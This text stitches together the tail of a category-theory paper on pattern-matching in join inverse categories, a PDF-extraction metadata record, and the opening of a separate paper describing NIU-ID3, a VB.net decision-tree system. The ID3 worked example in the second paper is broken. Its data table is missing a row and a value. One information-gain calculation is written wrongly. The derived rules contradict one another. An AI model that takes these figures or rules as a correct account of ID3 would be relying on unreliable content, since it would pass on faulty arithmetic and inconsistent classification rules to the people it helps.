if \(h = f \lor g\) with \(f, g : A \to B\), then \(f \leq g\) or \(g \leq f\). Remark 5.5 Let us observe that \(\text{snd} \Rightarrow \text{lnd} \Rightarrow \text{wnd}\). Even if they look alike, these definitions imply large differences. A strongly non decomposable morphism does not have any morphism strictly less than itself, except 0. On the other hand, linear non decomposability allows a certain order of morphisms, with a linear constraint. Finally the weak form gives very few information, as shown in the following example. Example 5.6 (Weakly non decomposable morphism) Consider a subcategory of \(\text{PInj}\) with one object \(\{a, b, c\}\) and with the identity and the four partial isos: \(f\) of domain \(\{a, b, c\}\), \(g\) of domain \(\{a\}\), \(h\) of domain \(\{b\}\) and 0 of empty domain. This subcategory is a join inverse category. In this subcategory, the identity is weakly non decomposable: it cannot be written as a join without itself in it. Nonetheless, the morphism \(f\) is decomposable: the property of weakly non decomposability is not downwards closed, contrary to the two other notions. Weak non-decomposability then lead to very different results from the other notions. Definition 5.7 (Pattern-matching) A weakly (resp. linearly, strongly) pattern-matching category \(C\) is a join inverse category in which for all \(f, g \in \text{Hom}_C(A, B)\) and \(h \in \text{Hom}_C(C, A)\), if \(f \sim g\) and \(h\) is weakly (resp. linearly, strongly) non decomposable, then \[(f \lor g)h = fh \quad \text{or} \quad (f \lor g)h = gh.\] Note that we do not need the compatibility of the inverses to define the pattern-matching. This straightforward definition of what we would like to have in our category is, however, difficult to grasp and manipulate; therefore we introduce an equivalent presentation: the correspondence between the two definitions is shown in Theorem 5.9. Definition 5.8 (Consistency) A join inverse category is said weakly (resp. linearly, strongly) consistent when \(h : A \to B\) weakly (resp. linearly, strongly) non decomposable implies that for all morphism \(f : B \to C\), the morphism \(fh\) is weakly (resp. linearly, strongly) non decomposable. Theorem 5.9 A weakly (resp. linearly, strongly) consistent join inverse category is a weakly (resp. linearly, strongly) pattern-matching category. Indeed, if a join \(f \lor g\) is composed on the left with a non decomposable morphism \(h\), consistency ensures that \( fh \lor gh \) stays non decomposable. This means that it can be only be one of the morphisms that form the join, which is exactly pattern-matching. **Theorem 5.10** A weakly pattern-matching category is weakly consistent. \( \Box \) This theorem validates the choices of definition made above, and it underlines a strong link between pattern-matching and non decomposability. Notwithstanding, an inverse category is not necessarily a weakly pattern-matching category: **Example 5.11 (Not weakly consistent)** Consider the subcategory of \( \text{PlInj} \) presented in Example 5.6. Although \( \text{id}_{\{a,b,c\}} \) is weakly non decomposable, the composition \( (g \lor h)\text{id}_{\{a,b,c\}} \) is equal to \( g \lor h = f \), different from both \( g \) and \( h \): the subcategory is not weakly consistent. Thus, if we were willing to work with weak non decomposability, not every inverse category can be involved. As shown below, the notions of linear and strong non decomposability let us consider any inverse category. Of course, the complexity does not disappear: it simply moves from the definition of the category to the number of morphisms that we can consider, since linear and strong non decomposability are far more demanding properties than the weak one. **Theorem 5.12** A join inverse category is strongly consistent. \( \Box \) Even if it is not a surprise, this result is interesting. Strongly non decomposability is a very demanding property; but since it implies some morphisms being equal to 0, composing on the left naturally does not change the property. **Example 5.13** A morphism in a join inverse category can be linearly non decomposable without being strongly non decomposable. Indeed, consider the (join inverse) sub-category of \( \text{PlInj} \) whose only object is \( \{a,b\} \), and with morphisms 0, \( \text{id} \) and \( f \), the partial identity whose domain is \( \{a\} \). Then we have \( 0 < f < \text{id}_{\{a,b\}} \). While it is linearly non-decomposable, the identity is not strongly non-decomposable. Fortunately, we still have the following result: **Theorem 5.14** A join inverse category is linearly consistent. \( \Box \) **Remark 5.15** Linear decomposability is then the best property to consider for pattern-matching. In the context of pattern-matching categories, linear non decomposable maps then essentially correspond to “pure” values waiting to be matched against a set of “orthogonal” clauses —this orthogonality being captured by the compatibility of the morphisms representing the clauses. ### 5.2 The case of our language The previous subsection being an attempt to develop a categorical theory of pattern-matching, we can now take a look at how it would apply to the case of the minimal language of Section 2, whose only base type is the unit type with one single constant. Its semantics in a join inverse rig category \( C \) is straightforwardly given by the identity \( \text{id}_1 \) over 1, the unit of the monoidal structure. We are in the context of Section 4.5, where all closed values are denoted with morphisms \( 1 \rightarrow 1 \oplus \cdots \oplus 1 \), but where in the category, in general morphisms of this type are not necessarily injections —and there are more than one morphism \( 1 \rightarrow 1 \). **Theorem 5.16 (Denotation of closed values)** In a join inverse rig category \( C \), if \( \text{id}_1 \) is weakly (resp. linearly, strongly) non decomposable, then the denotation of a closed value \( v \) of the minimal language is weakly (resp. linearly, strongly) non decomposable. \( \Box \) Then in any join inverse category with \( \text{id}_1 \) linearly —or strongly— non decomposable, in the context of Sec. 4 the previous results allow us to apply pattern-matching: \([v_1] [v_2] [v_3] v = [v_1'] [v_2'] [v_3'] v\). **Example 4.4** is a nice way to picture a \( \text{id}_1 \) that is non-trivial. Suppose that \( S \) contains at least two elements. Then \( \text{id}_1 \) in \( \text{PlId}_S^0 \) is not even weakly non decomposable; if we consider the subcategory \( \text{SubPlId}_{\{a,b,c\}}^0 \) with \( S = \{a,b,c\} \), and with corresponding morphisms on \( \text{PlId}_S \{a\}, \{a,b\} \) and \( \{a,b,c\} \) only, then \( \text{id}_1 \) is linearly non decomposable but not strongly so. Note how \( \text{SubPlId}_{\{a,b,c\}}^0 \) is indeed a join inverse rig category, as the tensor is derived from the intersection on sets. ### 5.3 Soundness and adequacy From Theorem 5.16 we can derive the fact that any join inverse rig category where \( \text{id}_1 \) is linearly non-decomposable forms a sound and adequate model for the minimal language. The remaining results assume such an ambient semantics. Lemma 5.18 (Substitution) In the minimal language, for any value \( \Delta \vdash v : a \), \( \Delta \vdash v' : b \) and \( \Delta \vdash v : a \), we have \( [\sigma(v')] = [\sigma(v)] \circ [v] \). \[ \square \] Corollary 5.19 (Soundness) If \( t \to t' \), then \( [t] = [t'] \). \[ \square \] Definition 5.20 (Operational equivalence) Let's consider two terms \( t_1, t_2 \). We define \( t_1 \equiv t_2 \) as both \( t_1 \to^* v \) and \( t_2 \to^* v \). Theorem 5.21 (Adequacy) If \( t_1 \) and \( t_2 \) are closed, well-typed terms, then \( t_1 \equiv t_2 \) iff \( [t_1] = [t_2] \). 6 Discussion and conclusion Consider again Example 5.17. Following the same technique presented in the literature [31], one could be able extract from the minimal language of Section 2 a sub-category of \( \text{PId}^{\oplus}_{\{a,b,c\}} \) able to capture a notion of pattern-matching. However, this approach does not tell us anything about the categorical structures required to capture it: the machinery presented in Section 5 aims at answering this question. In particular, we discussed in Example 5.17 a subcategory of \( \text{PId}^{\oplus}_{\{a,b,c\}} \) in \( \text{SubPId}^{\oplus}_{\{a,b,c\}} \); the morphism \( \text{id} \) is linearly non-decomposable; Lemma 5.18 then shows that Equation (12) of Section 4.5 is correct in \( \text{SubPId}^{\oplus}_{\{a,b,c\}} \), while Theorem 5.21 guarantees that this subcategory is actually adequate: it strictly sits in between the image of the language and the whole category \( \text{PId}^{\oplus}_{\{a,b,c\}} \). In general, although the notions of pattern-matching and linear non-decomposability we presented in this paper are sufficient to recover a notion of pattern-matching, a question that is however left open is whether they are necessary. This is left as future work. Acknowledgments This work was supported in part by the French National Research Agency (ANR) under the research project SoftQPRO ANR-17-CE25-0009-02, by the DGE of the French Ministry of Industry under the research project PIA-GDN/QuantEx P163746-484124 and by the STIC-AmSud project Qapla’ 21-SITC-10. References
{"Source-Url": "https://www.coalg.org/calco-mfps2021/files/2021/08/Chardonnet-Lemmonier-Valiron.pdf", "len_cl100k_base": 12865, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 51253, "total-output-tokens": 15352, "length": "2e13", "weborganizer": {"__label__adult": 0.00057220458984375, "__label__art_design": 0.0005860328674316406, "__label__crime_law": 0.0004031658172607422, "__label__education_jobs": 0.0015106201171875, "__label__entertainment": 0.00014448165893554688, "__label__fashion_beauty": 0.00026297569274902344, "__label__finance_business": 0.0003879070281982422, "__label__food_dining": 0.0006937980651855469, "__label__games": 0.001079559326171875, "__label__hardware": 0.0012493133544921875, "__label__health": 0.0011167526245117188, "__label__history": 0.0005092620849609375, "__label__home_hobbies": 0.0001809597015380859, "__label__industrial": 0.0008668899536132812, "__label__literature": 0.0011816024780273438, "__label__politics": 0.00041103363037109375, "__label__religion": 0.0010986328125, "__label__science_tech": 0.11968994140625, "__label__social_life": 0.00015056133270263672, "__label__software": 0.0058441162109375, "__label__software_dev": 0.8603515625, "__label__sports_fitness": 0.0003705024719238281, "__label__transportation": 0.001049041748046875, "__label__travel": 0.00027632713317871094}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49486, 0.02338]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49486, 0.63572]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49486, 0.84108]], "google_gemma-3-12b-it_contains_pii": [[0, 3321, false], [3321, 8417, null], [8417, 11939, null], [11939, 13951, null], [13951, 18781, null], [18781, 23659, null], [23659, 28848, null], [28848, 33774, null], [33774, 38722, null], [38722, 43465, null], [43465, 48040, null], [48040, 48040, null], [48040, 49486, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3321, true], [3321, 8417, null], [8417, 11939, null], [11939, 13951, null], [13951, 18781, null], [18781, 23659, null], [23659, 28848, null], [28848, 33774, null], [33774, 38722, null], [38722, 43465, null], [43465, 48040, null], [48040, 48040, null], [48040, 49486, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49486, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 49486, null]], "pdf_page_numbers": [[0, 3321, 1], [3321, 8417, 2], [8417, 11939, 3], [11939, 13951, 4], [13951, 18781, 5], [18781, 23659, 6], [23659, 28848, 7], [28848, 33774, 8], [33774, 38722, 9], [38722, 43465, 10], [43465, 48040, 11], [48040, 48040, 12], [48040, 49486, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49486, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
4fcfb71c869d2ad1032738de7c5a18e0ea81134c
New Implementation of Unsupervised ID3 Algorithm (NIU-ID3) Using Visual Basic.net FARAJ A. EL-MOUADIB1, ZAKARIA S. ZUBI2, AHMED A. ALHOUNI3 1Computer Science Department, Faculty of Information Technology, Garyounis University, Benghazi, Libya, <elmouadib@yahoo.com> 2Computer Science Department, Faculty of Science, Altahadi University, Sirte, Libya, <zszubi@yahoo.com> 3Computer Science Department, Faculty of Science, Altahadi University, Sirte, Libya, <a_a_m_alhouni@yahoo.com> Abstract: The data volumes have increased noticeably in the few passed years, for this reason some researchers think that the volume of data will be duplicated every year. So data mining seems to be the most promising solution for the dilemma of dealing with too much data and very little knowledge. Database technology has dramatically evolved since 1970s and data mining became the area of attraction as it promises to turn those raw data into meaningful knowledge, which businesses can use to increase their profitability. The data mining systems are classified based on specific set of criteria such as classification according to kinds of databases mined, classification according to kinds of knowledge mined, classification according to kinds of techniques utilized and classification according to applications adapted. This classification can also be helpful to potential users to distinguish data mining systems and identify those that are best match their specific needs. The purpose of this paper is to implement one of the data mining techniques (classification) to deal with labeled data sets and merging it with another data mining technique (clustering) to deal with unlabeled data sets in a computer system using VB.net 2005. Our system (NIU-ID3), can deal with two types of data files namely; text data files and access database files. It can also preprocess unlabeled data (clustering of data objects) and process label data (classification). The NIU-ID3 can discover knowledge in two different forms, namely; decision trees and decision rules (classification rules), this approach is implemented in Visual Basic.net language with SQL. The system is tested with access database, text data (labeled datasets and unlabeled datasets) and presents the results in the form of decision trees, decision rules or simplified rules. Key Words: -Data mining, Data classification, ID3 algorithm, Supervised learning, Unsupervised learning, Decision tree, Clustering analysis. 1 Introduction Dealing with the huge amount of data produced by businesses has brought the concept of information architecture which started new project such as Data Warehousing (DW). The purpose of DW is to provide the users and analysts with an integrated view of all the data for a given enterprise. Data Mining (DM) and Knowledge Discovery in Databases (KDD) is one of the fast growing computer science fields. The popularity and importance is caused by an increased demand for analysis tools that help analysts and users to use, understand and benefit from these huge amounts of data. One theme of knowledge discovery is to gain general ideas from specific ones, which is the basic idea of learning. Machine learning is subfield of artificial intelligence field that deals with programs that learn from experience. Concept learning can be defined as the general description of a category giving some positive and negative examples. So, it is an automatic inference of a general definition of some concept, given examples labeled as members or non-members of the concept. "The aim of concept learning is to induce a general description of a concept from a set of specific examples." [1]. One of human cognition capabilities is the skills to learn concepts from examples. Human have remarkable ability for concept learning with the help of only a small number of positive examples of a concept. As the concept learning problems became more complex has necessitate the existence of more expressive representative language. According to [1], most of the concept learning systems uses attribute-value language where the data (examples) and output (concepts) are represented as conjunctions of attribute-value pairs. "Concept Learning is inferring a Boolean-valued function from training examples of its input and output."[5]. So, this simplicity of representation allowed efficient learning systems to be implemented. On the other hand this simplicity had represented the difficulty of inducing descriptions involving complex relations. "Inductive Learning, a kind of learning methods, has been applied extensively in machine learning."[2]. Current machine learning paradigms are divided to two groups, learning with teacher which is called supervised learning, and learning without teacher which is called unsupervised learning. According to [6], Data mining is the process of discovering meaningful new correlations, patterns and trends by sifting through large amounts of data stored in repositories, using pattern recognition technologies as well as statistical and mathematical techniques. Data Mining is considered to be a revolution in information processing and there are many definitions in the literature to what constitute data mining. According to [5], the attraction of the wide use of data mining is due to: - The availability of very large databases. - The massive use of new techniques coming from other disciplines of computer science community like neural networks, decision trees, induction rules. - Commercial interests in order to propose individual solutions to targeted clients. - New software packages, more user-friendly, with attractive interfaces, directed as much towards decision makers as professionals analysts, but much more expensive. The main objective of DM is to use the discovered knowledge for purposes of explaining current behavior, predicting future outcomes, or providing support for business decision. Data mining enables corporations and government agencies to analyze massive volumes of data quickly and relatively inexpensively. Today, mining can be performed on many types of data, including those in structured, textual, spatial, Web, or multimedia forms. "Data mining is the process of discovering advantageous patterns in data." [7]. Most data-mining methods (techniques) are based on very-well tested techniques from machine learning, pattern recognition, and statistics: classification, clustering, regression, etc... Data mining techniques are applicable to wide variety of problem areas. Some of these techniques are: - **Classification** is a supervised technique that maps (classifies) data object into one of several predefined classes, i.e. given an object and its input attributes, classification output is one of possible mutually exclusive classes. The aim of classification task is to discover some kind of relationship between inputs attributes and output class, so that discovered knowledge can be used to predict the class of new unknown object. - **Regression** is considered to be a supervised learning technique to build more or less transparent model, where the output is a continuous numerical value or vector of such values rather than discrete class. - **Clustering** is unsupervised learning technique, which aims at finding clusters of similar objects sharing number of interesting properties. - **Dependency modeling** consists of discovering model which describes significant dependencies among attributes. - **Change and deviation detection** is the task of focusing on discovering most significant changes or deviations in data between actual content of data and its expected content (previously measured) or normative values. - **Summarization** aims at producing compact and characteristic descriptions for a given set of data. It can take of multiple forms such as; numerical (simple descriptive statistical measures like means, standard deviations…), graphical forms (histograms, scatter plots…), or on the form of “if-then” rules. ## 2 Supervised learning Supervised learning is learning process that supplied with a set of example. The set of examples consists of the input data along with the correct output (class) for each example. "The supervised learning paradigm employs a teacher in the machine learning..." process.” [3]. Some examples of the well known supervised learning models include back propagation in neural networks, K-nearest neighbor, minimum entropy, and decision trees. 3 Unsupervised learning In unsupervised learning there is no teacher nor is the data pre-classified. So, the algorithm is never giving training set and is basically left on its own to classify its inputs. "The unsupervised learning paradigm has no external teacher to oversee the training process, and the system forms (natural grouping) of the input patterns.” [3]. One of the most well-known unsupervised methods is clustering. In unsupervised learning, the final achieved result reflects the input data in a more objectively manner and the disadvantage of such learning process is that the achieved classes are not necessarily have subjective meaning. 4 Classification and Decision tree Decision tree is a classification scheme that can be used to produce classification rules. In this section we will review some basic ideas of classification and the development of decision trees algorithm. The theoretical and practical aspects of the ID3 algorithm will also be presented and the features of ID3 will be explained in details. The way to deal with continuous valued attributes will be present. The design and implementation of our system will be demonstrated as well. Our system is unsupervised version of the ID3 and it is developed using Visual Basic.Net. 4.1 Classification background With enormous amounts of data stored in databases and data warehouses, it is increasingly important to develop powerful tools for data analysis to turn such data into useful knowledge that can be used decision-making. One of the most well studied data mining functionalities is classification due to its wide used in many domains. "Classification is an important data mining problem. Given a training database of records, each tagged with a class label." [8]. The task of classification is first step to build a model (classifier) from the given data (pre-classified data objects) and second step is to use the model to predict or classify unknown data objects. The aim of a classification problem is to classify transactions into one of a discrete set of possible categories. The input is a structured database comprised of attribute-value pairs. Each row of the database is a transaction and each column is an attribute taking on different values. One of the attributes in the database is designated as the class attribute; the set of possible values for this attribute being the classes. Classification is a data mining technique that typically involves three phases, learning phase, testing phase and application phase. The learning model or classifier is built during learning phase. It may be in form of classification rules, decision tree, or mathematical formula. Since, class label of each training sample is provided, this approach is known as supervised learning. In testing phase test data are used to assess the accuracy of classifier. If classifier passes the test phase, it is used for classification of new, unclassified data tuples. The application phase, the classifier predicts class label for these new data objects. According to [2], classification has been applied in many fields, such as medical diagnosis, credit approval, customer segmentation and fraud detection. There are several techniques (methods) of classification: - Classification by decision tree induction such as: ID3 (Iterative Dichotomizer 3rd), C4.5, SLIQ, SPRINT and rainforest algorithms. - Bayesian classification by the use of Bayes theorem. - Classification by back propagation in the area of NN. - Classification based on the concepts from association rule mining. - Other classification methods: KNN classifiers, case based reasoning, genetic algorithms, rough set approach, fuzzy set approaches. 4.2 Decision tree algorithm A decision tree is a flow chart like tree structure. The top most node in the tree is the root node. Each node in the tree specifies a test on some attribute and each branch descending from the node corresponds to one of the possible values of the attribute except for the terminal nodes that represent the class. An instance is classified by starting at the root node of the tree, testing the attribute specified by the given node, then moving down the tree branch corresponding to the value of the attribute in the given example. This process is repeated for the sub tree rooted at the current node. In order to classify an unknown sample, the attribute values of the sample are tested against the decision tree. A path is traced from the root to a leaf node that holds the class for that instance. According to [9], Top-Down Induction of Decision Tree (TDIDT) is general purpose systems which classify sets of examples based on their attribute values pairs. The TDIDT algorithm can be rerun to include new example of the data sets. While this is useful feature, it is also time consuming. One of earliest TDIDT algorithms is the Concept Learning System (CLS) by Hunt in 1966. The algorithm works by presenting system with training data from which top-down decision tree is developed based on frequency of information. In 1986, Quinlan had modified CLS algorithm by enhancing it by the addition of the concept of windowing and information-based measure called entropy. The entropy is used to select the best attribute to split the data into two subsets, so every time the produced decision tree will be the same. The concept of windowing is used to ensure that all the cases in the data are correctly classified. According to [10], there are several reasons that make decision tree very attracting learning tool. Such as: - Decision tree learning is a mature technology. It has been in existence for 20+ years, has been applied to various real world problems, and the learning algorithm has been improved by several significant modifications. - The basic algorithm and its underlying principles are easily understood. - It is easy to apply decision tree learning to a wide range of problems. - Several good, easy to use decision tree learning packages are available. - It is easy to convert the induced decision tree to a set of rules, which are much easier for human to evaluate and manipulate, and to be incorporated into an existing rule based systems than other representations. 5 The ID3 algorithm According to [9], the ID3 algorithm is a decision tree building algorithm which determines classification of objects by testing values of their properties. It builds tree in top down fashion, starting from set of objects and specification of properties. At each node of tree, the properties are tested and the result is used to partition data object set. This process is recursively carried out till each subset of the decision tree is homogeneous. In other words it contains objects belonging to same category. This then becomes leaf node. At each node of the tree, the tested property is chosen on bases of information theoretic criteria that seek to maximize the information gain and the minimize entropy. In simpler terms, the chosen property is the one that divides the set of objects in the most possible homogeneous subsets. The ID3 algorithm has been successfully applied to wide variety of machine learning problems. It is well known algorithm, however such approach has some limitations. In ID3, windowing is to select a random subset of the training set to be used to build the initial tree. The remaining input cases are then classified using the tree. If the tree gives correct classification for these input cases then it is accepted for training set and the process ends. If this is not the case then the misclassified cases are appended to the window and the process continues until the tree gives the correct classification. The information theoretic heuristic is used to produce shallower trees by deciding an order in which to select attributes. The first stage in applying the information theoretic heuristic is to calculate the proportions of positive and negative training cases that are currently available at a node. In the case of the root node this is all the cases in the training set. A value known as the information needed for the node is calculated using the following formula where \( p \) is the proportion of positive cases and \( q \) is the proportion of negative cases at the node: \[ - p \log_2 p - q \log_2 q \] The basic algorithm of ID3 According to [11, 12, 13, and 14], given a set of examples \( S \), each of which is described by number of attributes along with the class attribute \( C \), the basic pseudo code for the ID3 algorithm is: - If (all examples in \( S \) belong to class \( C \)) then make leaf labeled \( C \) - Else select the “most informative” attribute \( A \) - Partition \( S \) according to \( A \)’s values \( (v_1, \ldots, v_n) \) - Recursively construct sub-trees \( T_1 \), \( T_2 \), \( T_n \) for each subset of \( S \). ID3 uses a statistical property, called information gain measure, to select among the candidates attributes at each step while growing the tree. To define the concept of information gain measure, it uses a measure commonly used in information theory, called entropy. The entropy is calculated by: \[ \text{Entropy}(S) = \sum_{i=1}^{c} - p_i \log_2 p_i \] Where \( S \) is a set, consisting of \( s \) data samples, \( p_i \) is the portion of \( S \) belonging to the class \( i \). Notice that the entropy is 0 when all members of \( S \) belong to the same class and the entropy is 1 when the collection contains an equal number of positive and negative examples. If the collection contains unequal numbers of positive and negative examples, the entropy is between 0 and 1. In all calculations involving entropy, the outcome of \((0 \log 0)\) is defined to be 0. With the Information gain measure, given entropy as a measure of the impurity in a collection of training examples, a measure of effectiveness of an attribute in classifying the training data can be defined. This measure is called information gain and is the expected reduction in entropy caused by partitioning the examples according to this attribute. More precisely, the information gain is \( \text{Gain}(S, A) \) of an attribute \( A \), relative to a collection of examples \( S \), is defined as: \[ \text{Gain}(S, A) = \text{Entropy}(S) - \sum_{v \in \text{Value}(A)} \frac{|S_v|}{|S|} \text{Entropy}(S_v) \] Where values of \( A \) is the set of all possible values for attribute \( A \), and \( S_v \) is the subset of \( S \) for which attribute \( A \) has value \( v \). The first term in the equation is the entropy of the original collection \( S \), and the second term is the expected value of the entropy after \( S \) is partitioned, using attribute \( A \). \( \text{Gain}(S, A) \) is the expected reduction in entropy caused by knowing the value of attribute \( A \). Therefore the attribute having the highest information gain is to be preferred in favor of the others. Information gain is precisely the measure used by ID3 to select the best attribute at each step in growing the decision tree. As an example indicated in [4, 9, 13, 15, 16, 17, 18 and 19], consider decision model to determine whether the weather is amenable to play baseball. Historic data of observations over period of two weeks is available to build a model as depicted in table 1. <table> <thead> <tr> <th>Day</th> <th>outlook</th> <th>temperature</th> <th>humidity</th> <th>wind</th> <th>play ball</th> </tr> </thead> <tbody> <tr> <td>D1</td> <td>sunny</td> <td>Hot</td> <td>high</td> <td>weak</td> <td>no</td> </tr> <tr> <td>D2</td> <td>sunny</td> <td>hot</td> <td>high</td> <td>strong</td> <td>no</td> </tr> <tr> <td>D3</td> <td>overcast</td> <td>hot</td> <td>high</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D4</td> <td>rain</td> <td>mild</td> <td>high</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D5</td> <td>rain</td> <td>cool</td> <td>normal</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D6</td> <td>rain</td> <td>cool</td> <td>normal</td> <td>strong</td> <td>no</td> </tr> <tr> <td>D7</td> <td>overcast</td> <td>cool</td> <td>normal</td> <td>strong</td> <td>no</td> </tr> <tr> <td>D8</td> <td>sunny</td> <td>mild</td> <td>high</td> <td>weak</td> <td>no</td> </tr> <tr> <td>D9</td> <td>sunny</td> <td>cool</td> <td>normal</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D10</td> <td>rain</td> <td>mild</td> <td>normal</td> <td>weak</td> <td>yes</td> </tr> <tr> <td>D11</td> <td>mild</td> <td>normal</td> <td>strong</td> <td>yes</td> <td></td> </tr> <tr> <td>D12</td> <td>overcast</td> <td>mild</td> <td>high</td> <td>strong</td> <td>no</td> </tr> <tr> <td>D13</td> <td>overcast</td> <td>hot</td> <td>normal</td> <td>weak</td> <td>yes</td> </tr> </tbody> </table> Table 1: Sample data to build a decision tree using ID3 algorithm. The weather data attributes are: outlook, temperature, humidity, and wind speed. The target class is the classification of the given day as being suitable (yes) or not suitable (no). The domains of each of the attributes are: - outlook = (sunny, overcast, rain). - temperature = (hot, mild, cool). - humidity = (high, normal). - wind = (weak, strong). To determine attribute that would be root node for the decision tree; the gain is calculated for all four attributes. First, we must calculate the entropy for all examples, with \( S \) by using the gain equation as follows: \[ \text{Entropy}(S) = - \frac{9}{14} \log_2 \left( \frac{9}{14} \right) - \frac{5}{14} \log_2 \left( \frac{5}{14} \right) = 0.940 \] Where: \[ \text{Entropy}(\text{weak}) = - \frac{6}{8} \log_2 \left( \frac{6}{8} \right) - \frac{2}{8} \log_2 \left( \frac{2}{8} \right) = 0.811 \] \[ \text{Entropy}(\text{strong}) = - \frac{3}{6} \log_2 \left( \frac{3}{6} \right) - \frac{3}{6} \log_2 \left( \frac{3}{6} \right) = 1.00 \] \[ \text{Gain}(S, \text{wind}) = \text{Entropy}(S) - \frac{8}{14} \times \text{Entropy}(\text{weak}) - \frac{6}{14} \times \text{Entropy}(\text{strong}) = 0.940 - \left( \frac{8}{14} \times 0.811 \right) = 0.048 \] After that we can calculate the information gain for all four attributes by the use of the previous equation as follows: \[ \text{Entropy}(\text{weak}) = - \frac{6}{8} \log_2 \left( \frac{6}{8} \right) - \frac{2}{8} \log_2 \left( \frac{2}{8} \right) = 0.811 \] \[ \text{Entropy}(\text{strong}) = - \frac{3}{6} \log_2 \left( \frac{3}{6} \right) - \frac{3}{6} \log_2 \left( \frac{3}{6} \right) = 1.00 \] \[ \text{Gain}(S, \text{wind}) = \text{Entropy}(S) - \frac{8}{14} \times \text{Entropy}(\text{weak}) - \frac{6}{14} \times \text{Entropy}(\text{strong}) = 0.940 - \left( \frac{8}{14} \times 0.811 \right) = 0.048 \] Similarly the gain is calculated for the other attributes, \[ \text{Gain}(S, \text{outlook}) = 0.246 \] \[ \text{Gain}(S, \text{temperature}) = 0.029 \] \[ \text{Gain}(S, \text{humidity}) = 0.151 \] Because the outlook attribute has the highest gain, therefore it is used as the decision tree root node. The outlook attribute has three possible values; the root node has three branches labeled with sunny, overcast and rain. The next step is to develop the sub tree, one level at a time, starting from the left (under sunny) using the remaining attributes namely humidity, temperature and wind. The calculation of gain is carried out for each of the attributes given the value of the previous value of the attribute. The final decision tree obtained as the result of ID3 algorithm is depicted in figure 1: The following rules are generated from the above decision tree: - IF outlook= overcast THEN play ball= yes - IF outlook= rain ∧ wind= strong THEN play ball= yes - IF outlook= rain ∧ wind= weak THEN play ball= yes - IF outlook= sunny ∧ humidity= high THEN play ball= no - IF outlook= rain ∧ humidity= high THEN play ball= no 5.1 Features of ID3 The most important feature of ID3 algorithm is its capability to break down a complex decision tree into a collection of simpler decision trees. Thus it provides a solution which is often easier to interpret. In addition, some of other important features are: - Each attribute can provide at most one condition on a given path. This also contributes to comprehensibility of the resulted knowledge. - Complete hypothesis space: any finite discrete valued function can be expressed. - Incomplete search: searches incompletely through the hypothesis space until the tree is consistent with the data. - Single hypothesis: only one current hypothesis (the best one) is maintained. - No backtracking: once an attribute is selected, this can’t be changed. - Full training set: attributes are selection by computing information gain on the full training set. 6 Design and implementation 6.1 Different types of attributes Due to the fact that the ID3 algorithm deal with discrete valued attributes and we have decided to limit the number of values per attribute to four. The reason for that is to have simple decision trees and rules. If the number of different values per attribute is greater than four then the (NIU-ID3) system will reduce it to four by the use of discretization (normalization) techniques. This process is carried out on numerical attributes and for symbolic attribute values the same process will be carried out after coding the attributes values. For a continuous valued attribute A, the system partitions the attribute values into four intervals by: \[ \text{Length of interval} = \frac{\text{Max}_A - \text{Min}_A}{C} \] Where: MaxA is the maximum value of attribute A, MinA is the minimum value of attribute A and C is the number of intervals (default value is 4). For example: if we have a numerical attribute with the following values: 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 76, 77, 79. We can calculate the interval length as: \((79 – 43) / 4 = 9\). The intervals and the corresponding values can be seen in the diagram below: Table 2 depicts the original values with their corresponding new values. <table> <thead> <tr> <th>Original values</th> <th>Corresponding values</th> </tr> </thead> <tbody> <tr> <td>43, 44, 45, 46, 47, 48, 49, 50, 51</td> <td>11</td> </tr> <tr> <td>52, 53, 54, 55, 56, 57, 58, 59, 60</td> <td>12</td> </tr> <tr> <td>61, 62, 63, 64, 65, 66, 67, 68, 69</td> <td>13</td> </tr> <tr> <td>70, 71, 72, 73, 74, 76, 77, 79</td> <td>14</td> </tr> </tbody> </table> Table 2: The original values with their corresponding new values. Another example is for a symbolic attribute that has the following values: BB, CC, DD, EE, FF, GG and HH. Such attribute values is dealt with in the following way: - First, the values will be coded as: 01, 02, 03, 04, 05, 06 and 07. - Second, we calculate the interval width as: (7 - 1) / 4 = 1.5. The intervals and the corresponding values can be seen in the diagram below: ``` 25 4 55 7 11 12 13 14 ``` Table 3 depicts the original values with their corresponding codes and new values. <table> <thead> <tr> <th>Original values</th> <th>Corresponding values</th> <th>Corresponding discretized values</th> </tr> </thead> <tbody> <tr> <td>BB, CC</td> <td>01, 02</td> <td>11</td> </tr> <tr> <td>DD</td> <td>03</td> <td>12</td> </tr> <tr> <td>EE, FF</td> <td>04, 05</td> <td>13</td> </tr> <tr> <td>GG, HH</td> <td>06, 07</td> <td>14</td> </tr> </tbody> </table> Table 3: The original values with their corresponding codes and new discretized values. Each code for the corresponding values consists of two digits the first represents the attribute number and the second represents the interval number (attribute's value). For example, the code 13 is for the third value of the first attribute. 